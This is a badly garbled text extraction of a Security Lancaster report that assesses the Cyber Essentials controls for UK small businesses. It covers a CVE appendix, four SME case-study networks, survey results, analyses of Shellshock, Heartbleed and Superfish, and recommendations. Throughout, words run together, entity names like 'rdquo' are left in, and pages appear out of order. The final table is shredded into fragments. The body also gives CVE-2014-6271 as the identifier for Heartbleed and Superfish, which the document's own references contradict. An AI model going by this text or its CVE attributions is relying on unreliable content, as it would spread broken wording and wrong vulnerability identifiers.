CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
